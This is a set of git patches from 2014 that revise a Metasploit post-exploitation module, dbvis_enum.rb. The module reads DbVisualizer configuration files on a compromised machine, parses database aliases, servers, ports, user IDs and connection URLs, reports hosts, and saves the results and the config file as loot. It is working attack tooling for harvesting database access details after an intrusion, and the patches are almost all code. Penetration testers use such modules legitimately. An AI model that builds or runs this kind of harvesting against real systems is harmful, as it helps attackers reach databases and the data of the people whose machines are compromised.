ac3d453002b083bc0b59c9c81b87a83f1bad57f0 Mon Sep 17 00:00:00 2001 From: David Bloom Date: Tue, 15 Jul 2014 12:33:07 +0200 Subject: [PATCH 18/23] Update dbvis_enum.rb --- modules/post/multi/gather/dbvis_enum.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index 3623d4fd70..c6479d1a82 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -65,6 +65,7 @@ class Metasploit3 < Msf::Post unless file?(dbvis_file) print_status("File not found: #{dbvis_file}") print_status("This could be an older version of dbvis, trying old path") + case session.platform when /linux/ dbvis_file = "#{user_base}.dbvis/config/dbvis.xml" when /win/ From f3d953f8298100d2f5596fbcb880b6e8d2587f41 Mon Sep 17 00:00:00 2001 From: David Bloom Date: Tue, 15 Jul 2014 14:00:29 +0200 Subject: [PATCH 19/23] Old config file update Added functions to parse old and new config files. --- modules/post/multi/gather/dbvis_enum.rb | 161 ++++++++++++++++++------ 1 file changed, 122 insertions(+), 39 deletions(-) diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index c6479d1a82..da88ee3122 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -27,21 +27,9 @@ class Metasploit3 < Msf::Post end def run - db_table = Rex::Ui::Text::Table.new( - 'Header' => "Dbvis Databases", - 'Indent' => 2, - 'Columns' => - [ - "Alias", - "Type", - "Server", - "Port", - "Database", - "Namespace", - "Userid", - ]) - dbs = [] + + oldversion= false case session.platform when /linux/ @@ -62,7 +50,9 @@ class Metasploit3 < Msf::Post dbvis_file = user_profile + "\\.dbvis\\config70\\dbvis.xml" end + unless file?(dbvis_file) + #File not found, we next try with the old config path print_status("File not found: #{dbvis_file}") print_status("This could be an older version of dbvis, trying old path") case session.platform @@ -75,12 +65,11 @@ class Metasploit3 < Msf::Post print_error("File not found: #{dbvis_file}") return end + oldversion= true end - - db = {} - print_status("Reading: #{dbvis_file}") - dbfound = false + + print_status("Reading: #{dbvis_file}") raw_xml = "" begin raw_xml = read_file(dbvis_file) @@ -89,8 +78,61 @@ class Metasploit3 < Msf::Post print_error("Nothing read from file: #{dbvis_file}, file may be empty") return end + + if oldversion + # Parse old config file + db_table=pareseOldConfigFile(raw_xml) + else + # Parse new config file + db_table=pareseNewConfigFile(raw_xml) + end - # read config file + if db_table.rows.empty? + print_status("No database settings found") + else + print_line("\n") + print_line(db_table.to_s) + print_good("Try to query listed databases with dbviscmd.sh (or .bat) -connection -sql and have fun !") + print_good("") + # store found databases + p = store_loot( + "dbvis.databases", + "text/csv", + session, + db_table.to_csv, + "dbvis_databases.txt", + "dbvis databases") + print_good("Databases settings stored in: #{p.to_s}") + end + + print_status("Downloading #{dbvis_file}") + p = store_loot("dbvis.xml", "text/xml", session, read_file(dbvis_file), "#{dbvis_file}", "dbvis config") + print_good "dbvis.xml saved to #{p.to_s}" + end + + + # New config file parse function + def pareseNewConfigFile(raw_xml) + + db_table = Rex::Ui::Text::Table.new( + 'Header' => "Dbvis Databases", + 'Indent' => 2, + 'Columns' => + [ + "Alias", + "Type", + "Server", + "Port", + "Database", + "Namespace", + "Userid", + ]) + + dbs = [] + db = {} + dbfound = false + + # fetch config file raw_xml.each_line do |line| if line =~ / -sql and have fun !") - print_good("") - # store found databases - p = store_loot( - "dbvis.databases", - "text/csv", - session, - db_table.to_csv, - "dbvis_databases.txt", - "dbvis databases") - print_good("Databases settings stored in: #{p.to_s}") + + # New config file parse function + def pareseOldConfigFile(raw_xml) + + db_table = Rex::Ui::Text::Table.new( + 'Header' => "Dbvis Databases", + 'Indent' => 2, + 'Columns' => + [ + "Alias", + "Type", + "Url", + "Userid", + ]) + + dbs = [] + db = {} + dbfound = false + + # fetch config file + raw_xml.each_line do |line| + if line =~ // + dbfound=false + # save + dbs << db if (db[:Alias] and db[:Url] ) + db = {} + end + + if dbfound == true + # get the alias + if (line =~ /([\S+\s+]+)<\/Alias>/i) + db[:Alias] = $1 + end + + # get the type + if (line =~ /([\S+\s+]+)<\/Type>/i) + db[:Type] = $1 + end + + # get the user + if (line =~ /([\S+\s+]+)<\/Userid>/i) + db[:Userid] = $1 + end + + # get the user + if (line =~ /([\S+\s+]+)<\/Url>/i) + db[:Url] = $1 + end + end end - print_status("Downloading #{dbvis_file}") - p = store_loot("dbvis.xml", "text/xml", session, read_file(dbvis_file), "#{dbvis_file}", "dbvis config") - print_good "dbvis.xml saved to #{p.to_s}" + # Fill the tab + dbs.each do |db| + db_table << [ db[:Alias] , db[:Type] , db[:Userid], db[:Url]] + end + return db_table end + + end From 400b0f42764e6564ff283af7f27d95e8f0fc2f15 Mon Sep 17 00:00:00 2001 From: David Bloom Date: Tue, 15 Jul 2014 14:21:09 +0200 Subject: [PATCH 20/23] parse url to report host in old config --- modules/post/multi/gather/dbvis_enum.rb | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index da88ee3122..2214baf937 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -200,7 +200,7 @@ class Metasploit3 < Msf::Post end - # New config file parse function + # New config file parse function def pareseOldConfigFile(raw_xml) db_table = Rex::Ui::Text::Table.new( @@ -254,6 +254,12 @@ class Metasploit3 < Msf::Post # Fill the tab dbs.each do |db| + if (db[:Url] =~ /[\S+\s+]+[\/]+([\S+\s+]+):[\S+]+/i) + if ::Rex::Socket.is_ipv4?($1.to_s) + print_good("Reporting #{$1} ") + report_host(:host => $1.to_s); + end + end db_table << [ db[:Alias] , db[:Type] , db[:Userid], db[:Url]] end return db_table From 97dcc56225212d86f8c83e6189175f839c3aace2 Mon Sep 17 00:00:00 2001 From: David Bloom Date: Tue, 15 Jul 2014 14:23:40 +0200 Subject: [PATCH 21/23] Update dbvis_enum.rb --- modules/post/multi/gather/dbvis_enum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index 2214baf937..c8ce1c9cbc 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -260,7 +260,7 @@ class Metasploit3 < Msf::Post report_host(:host => $1.to_s); end end - db_table << [ db[:Alias] , db[:Type] , db[:Userid], db[:Url]] + db_table << [ db[:Alias] , db[:Type] , db[:Url], db[:Userid] ] end return db_table end From 526538ecd66009dafcc748b058c322bfd0135f27 Mon Sep 17 00:00:00 2001 From: David Bloom Date: Tue, 15 Jul 2014 15:04:46 +0200 Subject: [PATCH 22/23] Added dbvis version find and print --- modules/post/multi/gather/dbvis_enum.rb | 25 +++++++++++++++++++++++-- 1 file changed, 23 insertions(+), 2 deletions(-) diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index c8ce1c9cbc..d9ea2c347e 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -70,6 +70,7 @@ class Metasploit3 < Msf::Post print_status("Reading: #{dbvis_file}") + print_line() raw_xml = "" begin raw_xml = read_file(dbvis_file) @@ -93,7 +94,7 @@ class Metasploit3 < Msf::Post print_line("\n") print_line(db_table.to_s) print_good("Try to query listed databases with dbviscmd.sh (or .bat) -connection -sql and have fun !") - print_good("") + print_line() # store found databases p = store_loot( "dbvis.databases", @@ -131,9 +132,14 @@ class Metasploit3 < Msf::Post dbs = [] db = {} dbfound = false - + versionFound = false # fetch config file raw_xml.each_line do |line| + + if versionFound == false + vesrionFound = findVersion(line) + end + if line =~ // @@ -217,9 +223,15 @@ class Metasploit3 < Msf::Post dbs = [] db = {} dbfound = false + versionFound = false # fetch config file raw_xml.each_line do |line| + + if versionFound == false + vesrionFound = findVersion(line) + end + if line =~ // @@ -266,4 +278,13 @@ class Metasploit3 < Msf::Post end + def findVersion(tag) + found=false + if (tag =~ /([\S+\s+]+)<\/Version>/i) + print_good("DbVisualizer version : #{$1} ") + found=true + end + return found + end + end From 1d6f088eabfe6230c597a7fde1d86faa17f9ba7a Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 15 Jul 2014 11:31:37 -0500 Subject: [PATCH 23/23] Pass msftidy --- modules/post/multi/gather/dbvis_enum.rb | 50 ++++++++++++------------- 1 file changed, 25 insertions(+), 25 deletions(-) diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index d9ea2c347e..f7a433e4a5 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Post def run - oldversion= false + oldversion = false case session.platform when /linux/ @@ -38,7 +38,7 @@ class Metasploit3 < Msf::Post if (user =~ /root/) user_base = "/root/" else - user_base="/home/#{user}/" + user_base = "/home/#{user}/" end dbvis_file = "#{user_base}.dbvis/config70/dbvis.xml" when /win/ @@ -52,25 +52,25 @@ class Metasploit3 < Msf::Post unless file?(dbvis_file) - #File not found, we next try with the old config path + # File not found, we next try with the old config path print_status("File not found: #{dbvis_file}") print_status("This could be an older version of dbvis, trying old path") case session.platform when /linux/ - dbvis_file = "#{user_base}.dbvis/config/dbvis.xml" + dbvis_file = "#{user_base}.dbvis/config/dbvis.xml" when /win/ - dbvis_file = user_profile + "\\.dbvis\\config\\dbvis.xml" + dbvis_file = user_profile + "\\.dbvis\\config\\dbvis.xml" end unless file?(dbvis_file) print_error("File not found: #{dbvis_file}") return end - oldversion= true + oldversion = true end - print_status("Reading: #{dbvis_file}") - print_line() + print_status("Reading: #{dbvis_file}") + print_line() raw_xml = "" begin raw_xml = read_file(dbvis_file) @@ -79,13 +79,13 @@ class Metasploit3 < Msf::Post print_error("Nothing read from file: #{dbvis_file}, file may be empty") return end - + if oldversion # Parse old config file - db_table=pareseOldConfigFile(raw_xml) + db_table = pareseOldConfigFile(raw_xml) else # Parse new config file - db_table=pareseNewConfigFile(raw_xml) + db_table = pareseNewConfigFile(raw_xml) end if db_table.rows.empty? @@ -128,7 +128,7 @@ class Metasploit3 < Msf::Post "Namespace", "Userid", ]) - + dbs = [] db = {} dbfound = false @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Post if line =~ // - dbfound=false + dbfound = false if db[:Database].nil? db[:Database] = ""; end @@ -193,7 +193,7 @@ class Metasploit3 < Msf::Post end end - # FIll the tab and report eligible servers + # Fill the tab and report eligible servers dbs.each do |db| if ::Rex::Socket.is_ipv4?(db[:Server].to_s) print_good("Reporting #{db[:Server]} ") @@ -219,7 +219,7 @@ class Metasploit3 < Msf::Post "Url", "Userid", ]) - + dbs = [] db = {} dbfound = false @@ -235,7 +235,7 @@ class Metasploit3 < Msf::Post if line =~ // - dbfound=false + dbfound = false # save dbs << db if (db[:Alias] and db[:Url] ) db = {} @@ -268,9 +268,9 @@ class Metasploit3 < Msf::Post dbs.each do |db| if (db[:Url] =~ /[\S+\s+]+[\/]+([\S+\s+]+):[\S+]+/i) if ::Rex::Socket.is_ipv4?($1.to_s) - print_good("Reporting #{$1} ") - report_host(:host => $1.to_s); - end + print_good("Reporting #{$1}") + report_host(:host => $1.to_s) + end end db_table << [ db[:Alias] , db[:Type] , db[:Url], db[:Userid] ] end @@ -279,12 +279,12 @@ class Metasploit3 < Msf::Post def findVersion(tag) - found=false - if (tag =~ /([\S+\s+]+)<\/Version>/i) - print_good("DbVisualizer version : #{$1} ") - found=true - end - return found + found = false + if (tag =~ /([\S+\s+]+)<\/Version>/i) + print_good("DbVisualizer version : #{$1}") + found = true + end + return found end end